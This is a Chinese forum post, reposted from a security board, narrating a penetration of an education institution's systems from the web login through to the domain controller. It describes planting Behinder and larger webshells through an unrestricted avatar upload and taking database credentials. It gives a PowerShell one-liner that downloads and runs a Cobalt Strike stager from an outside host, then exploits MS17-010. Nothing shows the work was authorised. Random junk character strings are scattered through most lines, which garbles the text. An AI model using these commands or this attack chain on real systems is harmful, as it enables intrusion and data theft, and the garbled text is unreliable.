|
' c! i) B; ~) }- F2 l. T
这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路" f) P6 y7 `) s, y
- r) i7 M: \3 B! v7 ?
- k' q5 w& u' X. \3 N! _4 ?, e
/ H* F3 `& _- m5 b
5 x/ B. C2 e# O7 n9 L/ w7 l
0 T6 W: ~5 |& {, m! O
正文
- N$ x% `0 N2 K z, R/ I" X5 E# k: W* u
4 [- v* ?7 V: \8 r( P
$ W. G3 k3 n. b+ D* I
- Y& M2 v) s3 I/ I6 S0 r3 { 0 a k( U! E* [6 T, ^, G- V9 _: _+ d
; C' _" K" o5 C) \; {0 C+ v
目标:www.xxxx.com(一家教育机构)
1 \. G1 Z$ j. h g
打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能
7 t3 [, ~3 F5 |
( y0 T+ |8 P) R% M$ M. N9 n
8 G4 T4 x4 p* E  + i5 V/ {3 j C5 o2 I
) E( B4 e/ [ i F/ g
# s) d+ l$ Y& B! q; f 进行了简单的信息搜集
) {0 d2 E2 j. \4 x! T" |
6 Y5 ^+ c) @- l# |
2 R7 [! ?. K f* }, b4 S% @0 T
3 r2 b$ B1 U- Z
, f- M1 ] v9 \6 w 子域名搜集
0 H, f7 w: \& z! _) v6 {0 y ) C4 h7 b5 y9 V+ e% h1 _) |4 c+ G7 R! x
& [( q4 B$ }6 T
( }' J* k8 U" N5 _
% L8 `4 c. [' J/ p! y0 |
* q' C+ K! w8 ^" h I fofa找资产
3 v! |; h6 {0 f/ k
, G/ U6 B1 W9 Q0 h( u% \
9 ^0 x) A' e/ s' v& t
1 X% X2 g; F1 \# R
) p: t' {8 P/ o3 v' E- G, a  / N3 u: X: u8 x3 G1 [
! N( @8 F3 d) |. k' D N/ {3 m! x8 W
一共七个资产。去重之后只有两个。
, Q- U. n6 h1 N0 c: v8 i, K
0 x7 C( b `% H
+ A* Y" R% E$ H, { # G7 I" o H* b1 S8 ~2 k
6 H# v2 ^/ R9 V% l, o. n% b! @3 `5 r 目录探测
& D! |9 M$ |, _4 c/ o
- Z" _: h; W& _6 x5 F y0 H! D+ G9 `- p# b4 z# b4 q2 \
 2 z6 \' z1 `: c6 C R" `; M
2 v( l8 F C( |/ R
; \' ^7 t' Y1 q! `5 U
我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
; B6 M# U# `6 _/ l; G
$ q ~2 j5 n7 Z R7 h
, r: ~. i" p9 A% ^
. X$ P8 u& ?/ y) G6 x5 `. f
4 C1 k) }% T* r. \4 _: C; p 我又尝试了通过修改返回包来绕过登录界面
# h/ M" S# m+ N
- @8 Q* Y+ Y6 i" L; A) Q9 L+ Q4 ]; p2 r a- x6 n9 I% k
' h) B3 v; f% s3 G$ Z$ c; O- R / u- c# \$ e' y5 I$ w" Z! {- \' k( Q
' W: X- A* ^' _* L 还是不行,尝试注入无果
0 m; d7 ~* X% {+ w3 H1 j ( }3 T/ S& h2 q
& `# y) {; g3 |9 C 
# F, R$ K0 r( y / R. E4 r+ \& D/ E# C
" F' _& f; E3 R# e& s 不过我目录探测出了一处Spring信息泄露
3 _3 A/ ~" _5 ?; |
* j; D- `( y8 F8 b
& ]- j, W9 z+ M3 t, {: [/ N ' f% p0 g4 _) C6 D4 {, P
: c, W9 t) W# Q  & A9 ]; |2 {- w* O6 l1 d
/ i; ~5 u; j4 R, P7 c6 q5 b* n
$ d( n6 e/ Q% s$ |& {. V* h 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录9 d, {' p+ X7 y1 r# |
# g% N; P, }& `5 l7 U5 ]
0 i; S. I k$ P+ g. s4 S  ; n) p+ O; X$ J. g: q6 g
; Q: K4 D2 B" w6 S0 u' d$ X5 m, Q% [, _$ {1 ?3 b
后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。
5 ^8 T3 p1 f& V8 t* u0 u$ `( l) x
! r6 J+ s; z7 V. I( I0 _/ A5 X7 W. [% m; K8 y8 ?
2 a* U2 n$ G- V# y- P
/ l+ z3 A( u& G, E* u) u4 N4 s) x, {
获取有些师傅到这一步就手机抓包电脑测了。
3 T3 q, w% t1 q) Z0 @& T) j ) M6 G$ P2 P# m. ]; a, P* }
; w d1 f! q, K1 f Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。
, e) U8 f2 t# E, u8 e! j
! N% ~( h$ _" ~9 _4 ~8 x" b# m' Z1 B- w5 N- s! O
其中在一个公众号发现了小程序,可以进行注册。# _' ~! h# S9 F9 { d
" D- N6 k4 A3 G% z$ R* H' h* o) _6 |1 j$ H) p: c7 |
看到了头像上传,尝试上传获取WebShell& I- V" G6 Q# U V
+ Q; y* u$ K5 y5 s3 d1 R; b# y9 H- j# g; u1 }2 r |2 X
2 Z+ ^" y$ K. d$ Y! a+ K/ Q 7 I5 V9 N& h' e7 q
9 ^3 O' b' P ], | 未做任何限制成功GetShell,上了冰蝎马,目录没权限访问
3 I6 V( J8 O+ f6 B% q! M
7 W, M6 D3 @8 J! a4 }! v) ~) i! _: |2 D: g/ A9 M( N/ y3 Y
 * f1 L4 [5 q) }5 v/ Q
. ^7 H2 n" r9 {3 m5 h5 { Y+ _- r8 I. v; z2 I! ^5 l# V
然后上了大马* m% Z7 o$ a, K
1 E3 H/ U- S) r5 j
* f9 h1 G+ l9 Z; D1 F) G4 i: T8 w  ) g; d8 `6 V0 L# N! g- [
9 |0 z4 f8 F8 g& U' d3 Y
7 t$ m) {/ H9 f# m5 S. X& x  9 s. A8 b5 t! j
8 [: ^' ~( y4 l2 O. W4 ], l
% d' t: F) z0 p: x2 u 通过翻找文件发现数据库账号密码
% N( ]/ q/ G4 [5 f; a0 p. | 2 B0 g8 M2 M8 k P
3 x2 G* b/ _0 _! n1 I3 t! f
 ( S3 {$ w, C: n, t. m/ u
& g3 J1 V1 L. f P4 t
: U1 R% O) [3 b/ t8 S; w --内网渗透
: [6 Z, e) b' Q1 {/ g0 N - b2 Y0 G; I& N" S3 l) O
+ W& i7 e% {1 `( `0 K 直接通过powershell执行 cs上线
" F! S+ N+ F* ] { ) E& b. R+ ?- d v
' |% G0 _+ w7 O3 i8 B6 C& k powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"6 {, O3 v1 q/ d4 p# V0 w
0 P1 }1 ]" O$ _) c
2 S. R2 [- e; c$ S8 I+ n* Z9 I  : L0 I: ^& g# `6 ^" h( Z
9 N9 n+ h& [* b6 A( a8 P4 S n* s' Y4 }# ~' ~
进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破
" m7 v& y- A1 O+ k0 J# |
6 E) v0 j2 _/ S8 G7 n; V. x/ O; q6 L7 N) s- f E+ j
3 x' C2 U1 B. X# [+ o5 [. E# T( _ 4 s6 w1 f* x) f
6 c% V# v) O1 { k8 T/ O
登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
" o# {2 |+ z1 f/ v8 w4 y
5 ~& p5 a; ]( c
3 H- z" k# ?8 o& R$ E
+ L$ [' N& J7 D- ~7 q
/ ~( I9 U+ H3 K% \& S# i; d4 Y' j1 s0 q: u
 1 z @& B7 I3 D$ F% B
- `9 ]/ x6 t% b2 y( N" Y* J1 n- z3 G& U1 n9 e' B6 x+ E7 }
通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
4 u; C% F% d$ X) g' w
' v7 X5 d, g/ _( x
' G l \- O( S' H' _ , k" {/ p1 z9 {) a
3 z |- G9 x: x- Q' L3 j
1 I& T0 N8 P: A5 t( G y" u2 i$ c
+ c- X7 [4 g" K; @+ `" Q i/ B" ?4 Y4 W( {
# ]( @# t% t6 f/ I s% E' r3 _. l
2 j. G. l1 |0 Q& o1 r1 k2 h' ]/ V" B, ]1 a3 C4 \/ r
, S4 J8 r0 j$ y F$ M- C c2 Z
$ z. [$ W, n$ H& H. A; f% U" y4 k
" p/ F- A y. E" F6 G9 X
% n1 \: r1 e1 j5 S8 U& g/ H8 [
1 t! ]9 n$ f! D/ ?4 } 小结
) ^, P' l" b1 R H$ ^1 H, t
' M% {5 N% p- C3 c* ]) Y9 ^$ z
& [: J& k3 s1 F7 [7 U# J
8 g) y+ r6 t# j( x7 M9 v& X m( k C/ C0 ?# p# R
0 ]9 ~& S) H/ p 在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!
/ b7 m* Q7 K# n+ | ( b( g4 s2 `- s
$ }9 J1 V! B9 {* f( U
( \" Q* ? d- X$ r- f2 k( ] ' K0 d; G" N: o$ @4 k
. O. A7 M3 V6 @) @/ v: W -
$ H4 @# d4 L. K8 u; b& _) m) x
4 c1 m2 ~# t6 C& N9 E
; g3 q) T" Y5 ]# B& @9 W, `0 y+ ^ -
9 B, \( }. I, H 7 n) T" E; o* T# M0 y. J% X2 m
4 A& t. P; I: m: w3 g4 }
. h) X/ ~8 O; t7 _: J5 Y- ?& S+ f
作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html+ j: }7 [' N) d' Q
6 ?4 r: A# `- B- t- ^- H
2 _0 }3 k) b* P# N$ Q
$ L* h# C( K# E( M9 e- V$ B | 
发表于 2024-3-1 19:41:32
收藏
支持
反对